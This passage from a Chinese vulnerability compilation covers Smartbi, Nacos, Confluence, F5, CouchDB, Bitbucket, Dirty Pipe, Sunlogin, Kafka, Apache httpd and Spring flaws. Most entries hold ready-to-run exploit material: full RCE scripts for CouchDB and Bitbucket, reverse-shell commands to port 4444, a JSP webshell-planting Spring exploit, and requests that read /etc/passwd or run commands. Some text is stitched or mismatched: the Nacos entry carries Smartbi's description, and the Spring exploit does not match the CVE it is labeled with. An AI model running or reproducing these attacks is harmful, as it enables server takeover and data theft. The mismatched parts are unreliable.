POST /smartbi/vision/RMIServlet HTTP/1.1Host: your-ipContent-Type: application/x-www-form-urlencoded
className=UserService&methodName=loginFromDB¶ms=["system","0a"]
修复建议
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本:
https://www.smartbi.com.cn/patchinfo
18、Nacos 集群 Raft 反序列化漏洞
该漏洞源于 Nacos 集群处理部分 Jraft 请求时,未限制使用 hessian 进行反 。序列化,攻击者可以通过发送特制的请求触发该漏洞,最终执行任意远程代码。
该漏洞源于 Smartbi 默认存在内置用户,在使用特定接口时,攻击者可绕过用户身份认证机制获取内置用户身份凭证,随后可使用获取的身份凭证调用后台接口,最终可能导致敏感信息泄露和代码执行。
漏洞标签:利用链成熟、国产框架、影响范围广、服务器权限相关
漏洞编号:CNVD-2023-45001
漏洞类型:RCE
受影响版本:
-
1.4.0 <= Nacos < 1.4.6 -
2.0.0 <= Nacos < 2.2.3
利用方法:
exp
https://github.com/c0olw/NacosRce/
修复建议
-
默认配置下该漏洞仅影响 Nacos 集群间 Raft 协议通信的 7848 端口,此端口不承载客户端请求,可以通过限制集群外部 IP 访问 7848 端口来进行缓解。 -
官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本:https://github.com/alibaba/nacos/releases
19、Atlassian Confluence OGNL 表达式注入漏洞
在 Atlassian Confluence Server and Data Center 上存在 OGNL 注入漏洞,
恶意攻击者可以利用该漏洞发送特制请求从而在目标服务器上注入恶意 OGNL
表达式,造成远程执行代码并部署 WebShell。
漏洞标签:利用链成熟、历史重大漏洞、涉及重点系统
漏洞编号:CVE-2022-26134
漏洞类型:RCE
受影响版本:
-
Atlassian Confluence Server and Data Center >= 1.3.0 -
Atlassian Confluence Server and Data Center < 7.4.17 -
Atlassian Confluence Server and Data Center < 7.13.7 -
Atlassian Confluence Server and Data Center < 7.14.3 -
Atlassian Confluence Server and Data Center < 7.15.2 -
Atlassian Confluence Server and Data Center < 7.16.4 -
Atlassian Confluence Server and Data Center < 7.17.4 -
Atlassian Confluence Server and Data Center < 7.18.1
利用方法:
poc
GET //%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1Host: XX.XX.XX.XXUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie: JSESSIONID=3764D915B037D5A50D8025AA793E990AConnection: close
github利用脚本:
https://github.com/Nwqda/CVE-2022-26134
修复建议
-
升级 Atlassian Confluence Server and Data Center 至安全版本。 -
临时缓解方案:下载官方发布的 xwork-1.0.3-atlassian-10.jar 替换 confluence/WEB-INF/lib/目录下原来的 xwork jar 文件,并重启 Confluence。https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar
20、F5 BIG-IP iControl REST 身份验证绕过漏洞
F5 BIG-IP 是美国 F5 公司的一款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平台。F5 BIG-IP 存在访问控制错误漏洞,攻击者可以通过未公开的请求利用该漏洞绕过 BIG-IP 中的 iControl REST 身份验证来控制受影响的系统。
漏洞标签:利用链成熟、历史重大漏洞、影响范围广
漏洞编号:CVE-2022-1388
漏洞类型:认证绕过
受影响版本:
-
16.1.0<=F5 BIG-IP<=16.1.2 -
15.1.0<=F5 BIG-IP<=15.1.5 -
14.1.0<=F5 BIG-IP<=14.1.4 -
13.1.0<=F5 BIG-IP<=13.1.4 -
12.1.0<=F5 BIG-IP<=12.1.6 -
11.6.1<=F5 BIG-IP<=11.6.5
利用方法:
poc
文件读取 https://<IP>/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwdRCE https://<ip>/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin
检测脚本
https://github.com/jheeree/CVE-2022-1388-checker/blob/main/CVE-2022-1388.sh
使用方法
./CVE-2022-1388.sh hosts.txt修复建议、
-
建议升级至最新版本或可参考官方修复建议 Recommended Actions:https://support.f5.com/csp/article/K23605346
-
在受影响的版本内可执行以下步骤以缓解攻击:
1.通过自身 IP 地址阻止 iControl REST 访问。
2. 通过管理界面阻止 iControl REST 访问。
3. 修改 BIG-IP httpd 配置。
21、Apache CouchDB 权限提升漏洞
在 3.2.2 版本之前的 Apache CouchDB 中,可以在不进行身份验证的情况下访问不正确的默认安装并获得管理员权限:
CouchDB 打开一个随机网络端口,绑定到所有可用的接口以预期集群操作或runtime introspection,称为 "epmd "的实用程序向网络公布了这个随机端口。epmd 本身在一个固定的端口上监听。
CouchDB 包装之前为单节点和集群安装选择了一个默认的"cookie "值,该cookie 用于验证 Erlang 节点之间的任何通信。
漏洞标签:服务器权限相关、利用链成熟
漏洞编号:CVE-2022-24706
漏洞类型:权限提升
受影响版本:
-
Apache CouchDB <3.2.2
利用方法:
exp
# Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution (RCE)# Date: 2022-01-21# Exploit Author: Konstantin Burov, @_sadshade# Software Link: https://couchdb.apache.org/# Version: 3.2.1 and below# Tested on: Kali 2021.2# Based on 1F98D's Erlang Cookie - Remote Code Execution# Shodan: port:4369 "name couchdb at"# CVE: CVE-2022-24706# References:# https://habr.com/ru/post/661195/# https://www.exploit-db.com/exploits/49418# https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/# https://book.hacktricks.xyz/pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd#erlang-cookie-rce### !/usr/local/bin/python3
import socket
from hashlib import md5
import struct
import sys
import re
import time
TARGET = sys.argv[1]
EPMD_PORT = 4369 # Default Erlang distributed port
COOKIE = "monster" # Default Erlang cookie for CouchDB
ERLNAG_PORT = 0
EPM_NAME_CMD = b"x00x01x6e" # Request for nodes list
# Some data:
NAME_MSG = b"x00x15nx00x07x00x03x49x9cAAAAAA@AAAAAAA"
CHALLENGE_REPLY = b"x00x15rx01x02x03x04"
CTRL_DATA = b"x83hx04ax06gwx0eAAAAAA@AAAAAAAx00x00x00x03"
CTRL_DATA += b"x00x00x00x00x00wx00wx03rex"
def compile_cmd(CMD):
MSG = b"x83hx02gwx0eAAAAAA@AAAAAAAx00x00x00x03x00x00x00"
MSG += b"x00x00hx05wx04callwx02oswx03cmdlx00x00x00x01k"
MSG += struct.pack(">H", len(CMD))
MSG += bytes(CMD, 'ascii')
MSG += b'jwx04user'
PAYLOAD = b'x70' + CTRL_DATA + MSG
PAYLOAD = struct.pack('!I', len(PAYLOAD)) + PAYLOAD
return PAYLOAD
print("Remote Command Execution via Erlang Distribution Protocol.n")
while not TARGET:
TARGET = input("Enter target host:n> ")
# Connect to EPMD:
try:
epm_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
epm_socket.connect((TARGET, EPMD_PORT))
except socket.error as msg:
print("Couldnt connect to EPMD: %sn terminating program" % msg)
sys.exit(1)
epm_socket.send(EPM_NAME_CMD) # request Erlang nodes
if epm_socket.recv(4) == b'x00x00x11x11': # OK
data = epm_socket.recv(1024)
data = data[0:len(data) - 1].decode('ascii')
data = data.split("n")
if len(data) == 1:
choise = 1
print("Found " + data[0])
else:
print("nMore than one node found, choose which one to use:")
line_number = 0
for line in data:
line_number += 1
print(" %d) %s" % (line_number, line))
choise = int(input("n> "))
ERLNAG_PORT = int(re.search("d+$", data[choise - 1])[0])
else:
print("Node list request error, exiting")
sys.exit(1)
epm_socket.close()
# Connect to Erlang port:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET, ERLNAG_PORT))
except socket.error as msg:
print("Couldnt connect to Erlang server: %sn terminating program" % msg)
sys.exit(1)
s.send(NAME_MSG)
s.recv(5) # Receive "ok" message
challenge = s.recv(1024) # Receive "challenge" message
challenge = struct.unpack(">I", challenge[9:13])[0]
# print("Extracted challenge: {}".format(challenge))
# Add Challenge Digest
CHALLENGE_REPLY += md5(bytes(COOKIE, "ascii")
+ bytes(str(challenge), "ascii")).digest()
s.send(CHALLENGE_REPLY)
CHALLENGE_RESPONSE = s.recv(1024)
if len(CHALLENGE_RESPONSE) == 0:
print("Authentication failed, exiting")
sys.exit(1)
print("Authentication successful")
print("Enter command:n")
data_size = 0
while True:
if data_size <= 0:
CMD = input("> ")
if not CMD:
continue
elif CMD == "exit":
sys.exit(0)
s.send(compile_cmd(CMD))
data_size = struct.unpack(">I", s.recv(4))[0] # Get data size
s.recv(45) # Control message
data_size -= 45 # Data size without control message
time.sleep(0.1)
elif data_size < 1024:
data = s.recv(data_size)
# print("S---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode())
data_size = 0
else:
data = s.recv(1024)
# print("L---data_size: %d, data_recv_size: %d" %(data_size,len(data)))
time.sleep(0.1)
print(data.decode(), end='')
data_size -= 1024
修复建议
-
厂商已发布补丁修复漏洞,用户请尽快更新至安全版本:Apache CouchDB 3.2.2 及更高版本。 -
CouchDB 3.2.2 及更高版本将拒绝使用以前默认的 Erlang cookie 值为`monster',升级到此版本的安装将被迫选择不同的值。 -
此外,所有二进制包都已更新,以绑定 epmd 以及 CouchDB 分发端口分别为 127.0.0.1 和/或::1。 -
与此同时,请做好资产自查以及预防工作,以免遭受黑客攻击。
22、Atlassian Bitbucket Data Center 远程代码执行漏洞
Atlassian Bitbucket Data Center 存在远程代码执行漏洞。该漏洞是由于Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。
漏洞标签:数据库权限相关、利用链成熟、利用条件简单
漏洞编号:CVE-2022-26133
漏洞类型:RCE
受影响版本:
-
Atlassian Bitbucket Data Center >= 5.14.x -
Atlassian Bitbucket Data Center 6.x -
Atlassian Bitbucket Data Center < 7.6.14 -
Atlassian Bitbucket Data Center < 7.16.x -
Atlassian Bitbucket Data Center < 7.17.6 -
Atlassian Bitbucket Data Center < 7.18.4 -
Atlassian Bitbucket Data Center < 7.19.4 -
Atlassian Bitbucket Data Center 7.20.0
利用方法:
exp
#!/usr/bin/env python3# -*- coding: utf_8 -*-# @Time : 2022/5/7 0007 9:58
from urllib.parse import urlparse
import argparse
import requests
import logging
import socket
import time
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
'''
Atlassian Bitbucket Data Center反序列化漏洞(CVE-2022-26133)
# Windows Reverse Shell(未免杀)
command: powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
# Linux Reverse Shell
command: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}
'''
class CVE_2022_26133:
def __init__(self, target):
parse = urlparse(target)
self.url = parse.scheme + "://" + parse.netloc
self.log_init()
self.timeout = 3
self.proxies = None
# self.proxies = {"http": "http://127.0.0.1:8888", "https": "http://127.0.0.1:8888"}
def log_init(self):
LOG_FORMAT = "%(asctime)s - %(levelname)s - %(message)s"
logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)
def str_to_hex(self, param):
ll = []
for i in param:
ll.append(hex(ord(i)).split("x")[1])
return "".join(ll)
def dec_to_hex(self, param, n):
if n == 4:
return '{:04x}'.format(param)
elif n == 8:
return '{:08x}'.format(param)
def get_socket_connect(self):
try:
parse = urlparse(self.url)
target = parse.netloc.split(":")[0]
# default port
port = 5701
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(self.timeout)
sock.connect((target, port))
return sock
except Exception as msg:
logging.critical("target is not reachable, " + str(msg))
def generate_payload(self, cluster, command):
payload = cluster.hex()
payload += "FFFFFF9C"
# yso cb1 payload
payload += "ACED0005737200176A6176612E7574696C2E5072696F72697479517565756594DA30B4FB3F82B103000249000473697A654C000A636F6D70617261746F727400164C6A6176612F7574696C2F436F6D70617261746F723B7870000000027372002B6F72672E6170616368652E636F6D6D6F6E732E6265616E7574696C732E4265616E436F6D70617261746F72E3A188EA7322A4480200024C000A636F6D70617261746F7271007E00014C000870726F70657274797400124C6A6176612F6C616E672F537472696E673B78707372003F6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E636F6D70617261746F72732E436F6D70617261626C65436F6D70617261746F72FBF49925B86EB13702000078707400106F757470757450726F706572746965737704000000037372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000649000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00044C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870"
payload += self.dec_to_hex((1684 + len(command)), 8)
payload += "CAFEBABE0000003200390A0003002207003707002507002601001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100354C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700270100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002801003379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01001F79736F73657269616C2F7061796C6F6164732F7574696C2F476164676574730100083C636C696E69743E0100116A6176612F6C616E672F52756E74696D6507002A01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002C002D0A002B002E01"
payload += self.dec_to_hex((len(command)), 4)
payload += self.str_to_hex(command)
payload += "08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401000D537461636B4D61705461626C6501001D79736F73657269616C2F50776E6572383931393230313938343538303001001F4C79736F73657269616C2F50776E657238393139323031393834353830303B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002F000E0000000C000100000005000F003800000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000034000E00000020000300000001000F0038000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000038000E0000002A000400000001000F003800000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C00000024000300020000000FA70003014CB8002F1231B6003557B1000000010036000000030001030002002000000002002100110000000A000100020023001000097571007E0010000001D4CAFEBABE00000032001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003C000E0000000C000100000005000F001200000002001300000002001400110000000A000100020016001000097074000450776E72707701007871007E000D78"
# logging.info("payload: " + payload)
return payload
def verify(self, Batch=False):
logging.debug("Checking " + self.url)
try:
sock = self.get_socket_connect()
if sock is not None:
# get ClusterName
data = "000000027361"
sock.send(bytes.fromhex(data))
ClusterName = sock.recv(4) + sock.recv(1024)
sock.close()
if len(ClusterName) != 0:
logging.info("33[0;36mTarget is vulnerable.33[0m")
if Batch != False:
with open("success.txt", "a+") as fo:
fo.write(self.url + "n")
fo.close()
return ClusterName
except Exception as msg:
logging.critical(msg)
def exploit(self, command):
ClusterName = self.verify()
if ClusterName is not None:
try:
sock = self.get_socket_connect()
if sock is not None:
logging.info("command => " + command)
payload = self.generate_payload(ClusterName, command)
sock.send(bytes.fromhex(payload))
time.sleep(0.5)
res = sock.recv(1024)
sock.close()
if len(res) != 0:
logging.info("payload send success, check it.")
except Exception as msg:
if isinstance(msg, ConnectionResetError):
logging.warning("ConnectionResetError: Payload maybe execute successful once target is Linux, Check it.")
else:
logging.critical(msg)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u', dest='url', help='input target url, eg: http://192.168.1.1:7990/')
parser.add_argument('--verify', action='store_true', default=False, help='verify mode, verify if target is vulnerable.')
parser.add_argument('-c', dest='command', help='exploit mode, eg: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjExMC4xLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}')
parser.add_argument('-f', dest='file', help='verify targets in the file if vulnerable.')
args = parser.parse_args()
print("""
______ _______ ____ ___ ____ ____ ____ __ _ __________
/ ___ / / ____| |___ / _ ___ |___ |___ / /_ / |___ /___ /
| | / /| _| _____ __) | | | |__) | __) |____ __) | '_ | | |_ |_
| |___ V / | |__|_____/ __/| |_| / __/ / __/_____/ __/| (_) | |___) |__) |
____| _/ |_____| |_____|___/_____|_____| |_____|___/|_|____/____/
""")
if args.verify:
CVE_2022_26133(args.url).verify()
elif args.file:
with open(args.file, 'r') as f:
targets = f.readlines()
f.close()
for target in targets:
CVE_2022_26133(target.strip()).verify(True)
elif args.command:
CVE_2022_26133(args.url).exploit(args.command)
运行指令
python3 CVE-2022-26133.py -u http://192.168.110.136:7990-f target.txt
修复建议
当前官方已发布最新版本,建议受影响的用户及时更新升级到最新版本。
链接如下:
https://www.atlassian.com/software/bitbucket/download-archives
23、Linux Kernel 本地权限提升漏洞
CVE-2022-0847 是存在于 Linux 内核 5.8 及之后版本中的本地ᨀ 权漏洞。攻击者通过利用此漏洞,可覆盖重写任意可读文件中的数据,从而可将普通权限的用户提升到特权 root。CVE-2022-0847 的漏洞原理类似于 CVE-2016-5195 脏牛漏洞(Dirty Cow)但它更容易被利用。漏洞作者将此漏洞命名为“Dirty Pipe”。
漏洞标签:服务器权限相关、影响范围广、涉及重点系统、漏洞价值大、漏洞细节公开
漏洞编号:CVE-2022-0847
漏洞类型:权限提升
受影响版本:
-
5.8 <= Linux 内核版本 < 5.16.11 / 5.15.25 / 5.10.102
利用方法:
新增普通用户
useradd -m pikaqiu#-m:自动建立用户的登入目录useradd -s /bin/bash pikaqiu2#-s:指定用户登入后所使用的shell。
利用方法一
su - pikaqiu#切换成普通用户
wget https://haxx.in/files/dirtypipez.c
gcc dirtypipez.c -o exp
sudo find / -perm -u=s -type f 2>/dev/null
这个 POC 需要事先找到一个具有 SUID 权限的可执行文件,然后利用这个文件进行提权
利用方法二
sudo gitt clone https://github.com/imfiver/CVE-2022-0847
sudo bash Dirty-Pipe.sh
修复建议
更新升级 Linux 内核到以下安全版本:
-
Linux 内核 >= 5.16.11 -
Linux 内核 >= 5.15.25 -
Linux 内核 >= 5.10.102
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://www.debian.org/security/2022/dsa-5092
24、Sapido 多款路由器命令执行漏洞
Sapido 路由器存在命令执行漏洞,攻击者可通过未授权进入命令执行页面,进而可以 root 权限执行任意命令。
漏洞标签:服务器权限相关、漏洞细节公开、利用条件简单
漏洞编号:无
漏洞类型:RCE
受影响版本:
-
BR270n-v2.1.03 -
BRC76n-v2.1.03 -
GR297-v2.1.3 -
RB1732-v2.0.43
利用方法:
访问 ip/syscmd.htm 即可执行命令
修复建议
-
尽量不要使用命令执行函数。 -
客户端提交的变量在进入执行命令函数前要做好过滤和检测。 -
在使用动态函数之前,确保使用的函数是指定的函数之一。 -
对 PHP 语言来说,不能完全控制的危险函数最好不要使用。
25、向日葵远程代码执行漏洞
上海贝锐信息科技股份有限公司的向日葵远控软件存在远程代码执行漏洞(CNVD-2022-10270/CNVD-2022-03672),安装以下存在 windwos 问题版本的个人版和简约版,攻击者可利用该漏洞获取服务器控制权。
漏洞标签:社会工程学攻击、利用链成熟
漏洞编号:CNVD-2022-10270
漏洞类型:RCE
受影响版本:
-
向日葵个人版 for Windows <= 11.0.0.33 -
向日葵简约版 <= V1.0.1.43315(2021.12)
利用方法:
访问地址:http://ip:port/cgi-bin/rpc?action=verify-haras
抓包得到验证码
构造payload
访问地址:http://ip:port/check?cmd=ping..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fsystem32%2FWindowsPowerShell%2Fv1.0%2Fpowershell.exe+%20whoami加上cookie:CID=验证码抓包得到:nt authoritysyste
exp
importrequests,sysip = sys.argv[1]command = sys.argv[2]payload1 ="/cgi-bin/rpc?action=verify-haras"payload2 ="/check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+"headers = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0'}if"http://"notinip:host ="http://"+ ipelse:host = iptry:s = requests.Session()res = s.get(url=host + payload1,headers=headers)ifres.status_code ==200:res = res.json()Cid = res['verify_string']headers.update({'Cookie':"CID="+ Cid})res1 = s.get(url=host + payload2 + command,headers=headers)res1.encoding ="GBK"print(res1.text)else:passexceptExceptionase:print(e)
修复建议
1. 输入检查:应用程序必须实现输入检查机制,将所有从外部接收的数据都进行严格的检查和过滤,防止恶意代码被注入。
2. 参数化查询:采用参数化查询可以防止攻击者通过利用应用程序的注入漏洞来修改查询语句,实现任意代码执行的攻击。
3. 输出编码:在输出时对敏感字符进行编码保护,比如 HTML 编码,防止恶意代码直接输出执行。
4. 使用最新的安全防护措施:保证服务器系统和应用程序的所有组件、库和插件都是最 新的,确保已知的漏洞都得到修复。
5. 强制访问控制:应该设置访问控制机制,确保恶意用户无法访问敏感数据和代码。
26、Apache Kafka Connect JNDI 注入漏洞
由于 Apache Kafka Connect 中存在 JNDI 注入漏洞,当 Kafka Connect Worker
允许远程访问且可以创建或修改连接器时,恶意攻击者可通过修改连接器的Kafka 客户端属性配置,从而进行 JNDI 注入攻击或反序列化利用,成功利用此漏洞可在目标服务器上执行任意代码,获取目标服务器的控制权限。
漏洞标签:服务器权限相关、影响范围广、利用条件简单
漏洞编号:CVE-2023-25194
漏洞类型:RCE
受影响版本:
-
2.3.0 <= Apache Kafka <= 3.3.2
利用方法:
poc
POST /connectors HTTP/1.1Host:127.0.0.1:8083Content-Type: application/jsonContent-Length:821{"name":"xxx","config": {"connector.class":"io.debezium.connector.mysql.MySqlConnector","database.hostname":"127.0.0.1","database.port":"3306","database.user":"root","database.password":"xxxx","database.server.id":"xxxx","database.server.name":"xxxx","database.history.kafka.bootstrap.servers":"127.0.0.1:9092","database.history.kafka.topic":"xxxx","database.history.producer.security.protocol":"SASL_SSL","database.history.producer.sasl.mechanism":"PLAIN","database.history.producer.sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url="ldap://xxxx" useFirstPass="true" serviceName="x" debug="true" group.provider.url="xxx";"}}
修复建议
目前官方已修复该漏洞,受影响用户可以升级更新到安全版本。官方下载链接:
https://kafka.apache.org/downloads
27、Apache HTTP Server 请求走私漏洞
Apache HTTP Server 版本 2.4.0 - 2.4.55 的某些 mod_proxy 配置可能导致HTTP 请求走私攻击,这种攻击可能会导致绕过代理服务器中的访问控制,将非预期的 URL 代理到现有源服务器,以及缓存中毒等。
漏洞标签:服务器权限相关、影响范围广、利用条件简单
漏洞编号:CVE-2023-25690
漏洞类型:HTTP走私请求
受影响版本:
-
2.4.0<= Apache HTTP Server 版本<= 2.4.55
利用方法:
poc(无回显)
importurllib
from pwn import *
def request_prepare():
hexdata = open("pre.txt", "rb").read()
# print(hexdata)
hexdata = hexdata.replace(b' ', b'%20')
hexdata = hexdata.replace(b'rn', b'%0d%0a')
# print(hexdata)
uri = b'/hello/abc%20HTTP/1.1%0d%0aHost:%20127.0.0.1%0d%0aUser-Agent:%20curl/7.68.0%0d%0a%0d%0a' + hexdata + b'GET%20/flag.txt'
req = b'''GET %b HTTP/1.1r
Host: 10.7.1.16:8000r
r
''' % uri
return req
def send_and_recive(req):
rec = b''
ip = '10.7.1.16'
port = 8000
p = remote(ip, int(port))
p.send(req)
rec += p.recv()
print(rec.decode())
p.close()
return rec.decode()
req = request_prepare()
print(req)
# print(urllib.parse.unquote(req.decode()))
f = open('req.txt', 'wb')
f.write(req)
f.close()
res = send_and_recive(req)
f = open('res.txt', 'wb')
f.write(res.encode())
f.close()
修复建议
目前该漏洞已经修复,受影响用户可升级到以下版本:
Apache HTTP Server 版本 >= 2.4.56
下载链接:
https://httpd.apache.org/download.cgi
注:Apache HTTP Server 版本 2.4.56 中还修复了通过 mod_proxy_uwsgi 的HTTP 响应走私漏洞(CVE-2023-27522,中危),该漏洞影响了 Apache HTTPServer 版本 2.4.30 - 2.4.55。
28、Spring Framework 安全绕过漏洞
在带有 mvcRequestMatcher 的 Spring Security 配置中使用无前缀双通配符模式会导致 Spring Security 和 Spring MVC 之间的模式匹配不匹配,并可能导致安全绕过。
漏洞标签:服务器权限相关、影响范围广、利用条件简单、涉及重点系统
漏洞编号:CVE-2023-20860
漏洞类型:认证绕过
受影响版本:
-
6.0.0 - 6.0.6、5.3.0 - 5.3.25(注:5.3 之前的版本不受影响)
利用方法:
exp
#!/usr/bin/env python3#coding:utf-8
import requests
import argparse
from urllib.parse import urljoin
def Exploit(url):
headers = {"suffix":"%>//",
"c1":"Runtime",
"c2":"<%",
"DNT":"1",
"Content-Type":"application/x-www-form-urlencoded"
}
data = "class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat="
try:
go = requests.post(url,headers=headers,data=data,timeout=15,allow_redirects=False, verify=False)
shellurl = urljoin(url, 'tomcatwar.jsp')
shellgo = requests.get(shellurl,timeout=15,allow_redirects=False, verify=False)
if shellgo.status_code == 200:
print(f"漏洞存在,shell地址为:{shellurl}?pwd=j&cmd=whoami")
except Exception as e:
print(e)
pass
def main():
parser = argparse.ArgumentParser(description='Srping-Core Rce.')
parser.add_argument('--file',help='url file',required=False)
